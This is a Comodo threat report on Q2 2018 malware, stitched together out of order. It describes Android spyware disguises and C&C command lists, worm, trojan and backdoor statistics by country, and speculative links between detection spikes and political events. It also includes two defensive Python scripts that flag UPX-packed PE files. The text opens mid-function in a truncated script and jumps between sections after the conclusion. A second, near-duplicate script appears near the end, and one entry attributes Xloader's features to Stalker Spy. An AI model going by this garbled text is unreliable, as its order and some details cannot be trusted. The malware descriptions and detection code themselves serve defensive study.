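        hits.append("empty-first-section+high-entropy-payload")
    return hits


def build_sample_pe(names: List[str], payload: bytes, empty_first: bool) -> bytes:
    """Construct a minimal, non-executable PE image for testing (constructed data)."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ".ljust(e_lfanew, b"\0"))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine, NumberOfSections, 3 dwords, SizeOfOptionalHeader=0, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, 0, 0x0102)
    raw_ptr = 0x200  # file offset where the first section's raw bytes start
    table, body = b"", b""
    for i, name in enumerate(names):
        if i == 0 and empty_first:
            vsize, rsize, rptr = 0x10000, 0, 0  # reserved, no bytes on disk
        else:
            vsize, rsize, rptr = len(payload), len(payload), raw_ptr + len(body)
            body += payload
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             vsize, 0x1000 * (i + 1), rsize, rptr, 0, 0, 0, 0, 0x60000020)
    return (bytes(dos) + b"PE\0\0" + coff + table).ljust(raw_ptr, b"\0") + body


# Constructed inputs: 4 KiB using every byte value equally has entropy 8.0.
DENSE = bytes(range(256)) * 16
STOCK_UPX = build_sample_pe(["UPX0", "UPX1"], DENSE + b"UPX!", empty_first=True)
RENAMED_UPX = build_sample_pe([".text", ".data"], DENSE, empty_first=True)
PLAIN = build_sample_pe([".text", ".data"], b"A" * 4096, empty_first=False)

if __name__ == "__main__":
    for label, img in [("stock", STOCK_UPX), ("renamed", RENAMED_UPX), ("plain", PLAIN)]:
        print(label, packing_indicators(img) or "no packing indicators")
```

On a real sample, read the file bytes and pass them to packing_indicators; the layout heuristic is a triage signal, not proof, since legitimate installers also ship compressed sections.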
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact they are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
In addition to the abilities of previous versions, it includes some additional tricks:
Extracts photos, audio and videos
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Disguises of MikeSpy: Virtual Girlfriend
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control over the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Disguises of Xloader: Version 1 to Version 3 as FaceBook and Chrome
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contacts details
Set Wi-Fi to always turned on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
Disguises of Stalker Spy (app names and distribution): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Disguises of Mystery Bot: Version 1 as Adobe Flash Player, Version 2 as Flash Player
Mystery Bot comes under cover of Adobe Flash Player. Below is the list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset the forwarded calls
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
Disguises of FakeSpy: 佐川急便, 현대캐피탈
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Disguises of RedAlert: Version 1 as EbookReader, Update Flash Player, Android Update, WhatsApp, Viber; Version 2 as Update Google Market, Flash Player, Tactic, FlashLight
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.
Disguises of Hero Rat (Version 1): CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.
After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Disguises of Sonvpay (Version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, this malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Disguises of CoinHive: Version 1 as Netflix Hack, Instagram Hack; Version 2 as TSF Launcher; Version 3 as Android Service, PlacarTv Futebol Ao Vivo
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people by the FBI in 2012 for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
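As a defender-side illustration of the packing just described, the Python script below is an added example written for this edition (it is not Comodo's tooling and not UPX's own code). It parses a PE section table with nothing but the standard library and flags two packer indicators: UPX-style section names, and sections whose raw bytes have near-maximal Shannon entropy, which is what compressed or encrypted payloads look like before the unpacking stub restores them. The PE images it inspects are constructed inline by a small builder so the script runs offline; the 7.0 bits/byte threshold and the section-name set are assumptions chosen for the example.

```python
"""Packer heuristics for Windows PE files (added example, not Comodo's code).

Two indicators are checked per section: a UPX-style section name, and raw data
whose Shannon entropy is close to the 8 bits/byte ceiling, as compressed or
encrypted payloads are before the unpacking stub restores them.
"""
import math
import random
import struct
from collections import Counter
from typing import Iterator, List, Tuple

# Assumptions for this example: the marker names UPX gives its sections, and a
# threshold above which ordinary compiled code (typically 5-6.5 bits/byte) rarely sits.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b"UPX!"}
HIGH_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (section name, raw bytes) from the PE section table.

    Layout: e_lfanew at 0x3C -> PE signature -> 20-byte COFF header ->
    optional header (SizeOfOptionalHeader bytes) -> 40-byte section headers.
    """
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", image, pe_off + 20)[0]
    table = pe_off + 24 + opt_size
    for i in range(num_sections):
        hdr = table + 40 * i
        name = image[hdr:hdr + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)  # SizeOfRawData, PointerToRawData
        yield name, image[raw_ptr:raw_ptr + raw_size]


def packer_indicators(image: bytes) -> List[str]:
    """Return the reasons an image looks packed; an empty list means no indicator fired."""
    reasons = []
    for name, raw in parse_sections(image):
        label = name.decode("ascii", errors="replace")
        if name in UPX_SECTION_NAMES:
            reasons.append(f"section name {label} is a UPX marker")
        ent = shannon_entropy(raw)
        if raw and ent >= HIGH_ENTROPY:
            reasons.append(f"section {label} has entropy {ent:.2f} bits/byte")
    return reasons


def build_pe(sections: List[Tuple[bytes, bytes]]) -> bytes:
    """Construct a minimal PE image for testing (constructed input, not a real binary)."""
    pe_off = 0x40
    opt_size = 0  # no optional header: the section-table parser does not need one
    data_start = pe_off + 24 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    headers, body = b"", b""
    for name, raw in sections:
        headers += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(raw), 0x1000, len(raw), data_start + len(body), 0, 0, 0, 0, 0x60000020)
        body += raw
    return dos + coff + headers + body


# Constructed samples: repetitive "code" (low entropy) versus a seeded random
# payload standing in for compressed data (close to 8 bits/byte).
PLAIN_CODE = b"push ebp; mov ebp, esp; sub esp, 0x20; " * 64
_rng = random.Random(2018)
COMPRESSED_LIKE = bytes(_rng.getrandbits(8) for _ in range(4096))

CLEAN_IMAGE = build_pe([(b".text", PLAIN_CODE), (b".data", b"\0" * 512)])
PACKED_IMAGE = build_pe([(b"UPX0", b""), (b"UPX1", COMPRESSED_LIKE), (b".rsrc", b"\0" * 64)])

if __name__ == "__main__":
    for title, img in (("clean", CLEAN_IMAGE), ("packed", PACKED_IMAGE)):
        print(title, packer_indicators(img) or ["no packer indicator"])
```

Entropy alone is a heuristic: legitimate installers, media resources and signed updaters also carry high-entropy sections, so a triage pipeline would treat these indicators as a reason to unpack and inspect, not as a verdict.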
In Q2 2018 Russia was the #1 home to malware Packers.
